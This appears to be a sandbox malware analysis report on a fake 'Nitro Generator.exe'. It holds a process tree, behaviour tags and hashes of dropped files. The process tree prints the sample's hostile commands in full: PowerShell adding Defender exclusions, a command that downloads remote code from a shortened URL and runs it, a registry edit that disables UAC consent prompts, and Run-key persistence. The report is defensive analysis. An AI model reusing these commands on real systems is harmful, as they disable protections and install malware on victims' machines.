                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4824,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5136 /prefetch:8
                                                                                                                            3⤵
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:3968
                                                                                                                        • C:\Program Files\7-Zip\7zG.exe
                                                                                                                          "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap25154:92:7zEvent29367
                                                                                                                          2⤵
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          PID:2492
                                                                                                                        • C:\Users\Admin\Downloads\Nitro Generator.exe
                                                                                                                          "C:\Users\Admin\Downloads\Nitro Generator.exe"
                                                                                                                          2⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Drops startup file
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Adds Run key to start application
                                                                                                                          PID:5636
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nitro Generator.exe'
                                                                                                                            3⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:5436
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nitro Generator.exe'
                                                                                                                            3⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:5232
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nitro Generator.exe'
                                                                                                                            3⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:5660
                                                                                                                          • C:\Windows\SYSTEM32\CMD.EXE
                                                                                                                            "CMD.EXE"
                                                                                                                            3⤵
                                                                                                                              PID:5092
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                4⤵
                                                                                                                                  PID:5160
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Powershell "irm shorturl.at/K1U78 | iex"
                                                                                                                                  4⤵
                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:736
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -execUTIOnPoliCY BypaSs aDd-MPPREfeRenCe -ExCLUSIOnpaTh $Env:pROGRAMdata, $env:TEMp, $env:hOMEDrive; SeT-itEMPRoperty -patH "HKlM:\SoftwarE\miCrOsOFt\WINdoWS\CUrRENtverSION\pOlICieS\SySTeM" -NAmE "conSEntPrompTbeHavIoRADMIN" -ValUe 0 -tYPe DwoRD
                                                                                                                                    5⤵
                                                                                                                                    • UAC bypass
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:5804
                                                                                                                                  • C:\ProgramData\ukLAj.EXE
                                                                                                                                    "C:\ProgramData\ukLAj.EXE"
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:3484
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\rQHBDWIQ.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\rQHBDWIQ.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:392
                                                                                                                                  • C:\ProgramData\sVUZSib0.exe
                                                                                                                                    "C:\ProgramData\sVUZSib0.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:1940
                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 1940 -s 1648
                                                                                                                                      6⤵
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Enumerates system info in registry
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:1156
                                                                                                                                  • C:\ProgramData\wkKy3.exE
                                                                                                                                    "C:\ProgramData\wkKy3.exE"
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:3968
                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                                3⤵
                                                                                                                                  PID:1500
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    4⤵
                                                                                                                                      PID:2392
                                                                                                                                • C:\Users\Admin\Downloads\Nitro Generator.exe
                                                                                                                                  "C:\Users\Admin\Downloads\Nitro Generator.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3016
                                                                                                                                • C:\Users\Admin\Downloads\Nitro Generator.exe
                                                                                                                                  "C:\Users\Admin\Downloads\Nitro Generator.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:1308
                                                                                                                                • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2970:92:7zEvent13915
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  PID:5020
                                                                                                                                • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\.rsrc\version.txt
                                                                                                                                  2⤵
                                                                                                                                    PID:5824
                                                                                                                                  • C:\Users\Admin\Downloads\Nitro Generator.exe
                                                                                                                                    "C:\Users\Admin\Downloads\Nitro Generator.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:1648
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:3572
                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                    1⤵
                                                                                                                                      PID:3768
                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:3928
                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:3896
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                          1⤵
                                                                                                                                            PID:4476
                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                            1⤵
                                                                                                                                              PID:5052
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                              1⤵
                                                                                                                                                PID:4540
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                1⤵
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:2908
                                                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                1⤵
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:1828
                                                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:4056
                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4436
                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                    1⤵
                                                                                                                                                      PID:684
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4740
                                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1636
                                                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:4156
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5004
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                            1⤵
                                                                                                                                                              PID:3188
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                              1⤵
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              PID:2960
                                                                                                                                                            • C:\Windows\system32\OpenWith.exe
                                                                                                                                                              C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:1576
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2468
                                                                                                                                                              • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                PID:3656
                                                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2524
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:620
                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3504
                                                                                                                                                                    • C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                                                                                      "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2736
                                                                                                                                                                      • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                                                                        C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1996
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:2684
                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5240
                                                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5756
                                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5808
                                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800}
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5844
                                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5780
                                                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:1768
                                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:5512
                                                                                                                                                                                        • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\.rsrc\MANIFEST\1
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3092
                                                                                                                                                                                        • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                          C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:6048
                                                                                                                                                                                          • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\.reloc
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5856
                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:5976
                                                                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5436

                                                                                                                                                                                            Network

                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                            Downloads

                                                                                                                                                                                            • C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E0B.tmp.csv

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              46KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              a4a019bbb9283cdba971e82bce00299d

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              7faedd510493aa74c6413e79b84ff5e829fb62c3

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              19c6656c725308ba604e570575c626da95d85100a752c8fdf7ff7fe2e394d569

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              210ae482b9d3030c8362bba4cc4bbf6bd71f33977e13bd680a219a8ac954d5a33a194447ada1e6ace97c2834194cf352a422ed31220f4334dd624dde7ac083c6

                                                                                                                                                                                            • C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E2B.tmp.txt

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              13KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b5e264337e1fc8a1043f2e8e9b890d80

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              1a6921e5efde274b0638f9f925fbc81881ef64dd

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              49d22b4c9e00e18ec11c52d41cfe2584f61ba20b536eb59ab9736c33cf54d236

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              ec51f7ffa75a048efee387e61d829f3449125c3d0ca85e992e8346dba2ab95c1b783c9a141a27934e20b79bb002a05bf8b30d5828efc70e9a3f6872eb4f82fc6

                                                                                                                                                                                            • C:\ProgramData\sVUZSib0.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              c41db79b3ddbbeea2270d8dddbc53195

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              514a3f1ff8784a858c3d35cfbeed8eeb0c6d55c7

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              dadcc815015ad7820ed67a75985e7275ce4f2d4231b36dcebf2f3dc2a71913c3

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              d241011a4ebeb40d6b9d703965ec238653da4f5cdd9a44990d6031b017b378d9c65d06017b821c2f0cc30831cb799677a608bb39fda00935970510831a6ec435

                                                                                                                                                                                            • C:\ProgramData\ukLAj.EXE

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              13KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              02a326274f6fbc2c10002e6989f4571f

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              5d5aee1b6829fa401036968a034440fc07582191

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              b677c04687a6360ba75cc71d70331b46c00794cbffc3a65205207a8369df4015

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              30928b18c60eef0ba28017d1bdd8608a0ae51b006d4da6fd68b25aa7c639991ba720752cd6c346db14d32d5caa6a89355b70b31a6fd85187930740fd55524743

                                                                                                                                                                                            • C:\ProgramData\wkKy3.exE

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              163KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b20e29f2b88234cda8b95b43a4fec8aa

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              13cca52a0dc3b9b352e14688f444ad9bcb9a9f4f

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              e2481565a6c7a26690e99f63eea8e04615f7b3d92ca4ada11e331ce1053f962a

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              019a4afbcd4c6236c226a05b0864df4f310fb91d41847dfcd84207d276a6219f66b725f5d3f637e7049d87fc81c88b8969a3061970be505bade70f767511313a

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              649B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              9a22fab11c5ca081b3c303188edccf1b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              96ad5c1bc4526ef7c8a5813c5b9b4668c9a1e488

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              cb551489bd59d1fb2bd73bd873e5b0cde5f6332e963463f59b3c79591f477fea

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              28b8db9ed3e0c7207ec73c0cf9d999247446d276ec0f787ee71fff83a23f35a6f37a8c1f226d8f549b75109a30cb5a183d22dadb1a600dfb463546e8186ebd33

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              120B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              792324985ff4ec1f055f45a9849334e3

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              e445e89a7e2274fcc1eba9972f7d7f5b29dfca6e

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              980fca3db3f0959e3583f2648fc324ff5e2ac8fb58b4f804241c07dd172034ab

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              89bf85d041935695e25896ab56c724794cf460b437f5e4ba82c568e680f46a7547424aa9bc7cf570932941ef5649f1d0a7ec7982a1ad09fa42d00c9a1c1e41ea

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\p\Paths\MANIFEST-000001

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              41B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\CURRENT

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              16B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              46295cac801e5d4857d09837238a6394

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              160KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              42142ab421bc3a15b7000787c1567f6e

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              83c9a2e83b650d1eed97a0e274805cf88f8c2402

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              4857a71b5f51ff46cf48850f1af9e9f80079499970c689d90890d3b5b13b2c34

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              eb3a0107e500b3b44f25559b07a727cbbd704e9986b064058fb0d559e34d0e9bbcd7541821c9cd274c1cfbcd0ac2994fd0db70a04c0d3fb5a226de9fe5bd9cc0

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b4ac2606db38a8df753a1af0d951e0ef

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              39b97fd27832c0ddabef576854233a0aa42409df

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              bd7710fcc6778838b4e4e473c1b5df9c3554210b63b0d1db35e5e51f163373c9

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              4b4c25dfb074ec5c9c9cd2215960a79787bae55ca7d01f598af472a6373d7a98a0381b79100fb3e4f577ab090c81b7bfbaffa72dd69467ba962568f81c52ad57

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              d751713988987e9331980363e24189ce

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              523B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              ad31bff81eae6a49945e67a3f3943791

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              f5e1dbcd5c33813ae87c865601f08bc2d0f06fb9

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              de28cc1994d135eb4cee663f15af806f492ce13ca07aeac5bd8e22cf051531a1

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              08fb239ff7f3f448427da59c2c16d70b4b8aabf64dcd1ffe485a7cc87ac7dbd6074825fba9cb1e240e8734a9cd443fae1d22dfb33a34cf425750b0b2fc83b1b8

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              9KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              ee71567dd18e23947e953bd1f0828a97

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              355646451b97d499af2300b567bbe41826cc2d67

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              521dc4caad432170ee726b01d6afe8f0db12e3cca0cc192e33aa7551933e671f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              36ac64547e5c21c796cba6c7cfc23e4bd31f19cba854e0b4fde851fe071b60f8bcea1fb9ee5eec1861a56a3a633eb9210bc972607b66fd7267599067a0424e7f

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              9KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              a44e1a4be77421fbf3dfa219d5f075ed

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              220d64e9fd9381aa76fd60137df79775d40723b6

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              e1d9b52122a20c6faa76688473685f4a3e8d2888369098cc499da46e48fc01e8

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              86cdd6985b08a1459a7ed3642a2ec5e80a67bd077859cdb55b9964d7a40b53ef2a0ecbd5c7e23d144305ad9d0cb301b73d728dc24d7ba29236a82dc02df52db3

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              9KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              d6d11f21ff411c4cfc4eb63b6bdececb

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              731b259b09bf39cfe9b0d733d65d19febc8ea0d2

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5cb61a7c975387ee42a26545af0a746f22a7e2427bdfef55cee598852e48df99

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              4e5454091de33334b74db0198c9fc686a46e26313e379bce271d25748930f9c316659ca423a82da213aa402c81c9990422b7467a1c273b922317816210fcb433

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              9KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              2739b45a04460e91d18459199796a315

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              d1fd24901d01b5ebb310ecef3a5cae3ec109bc1d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              f28a2f2875d3ca07fcc3b8870b7f1b9ffa60a9bc89cff8592315ce1b892ad2b4

                                                                                                                                                                                              SHA512

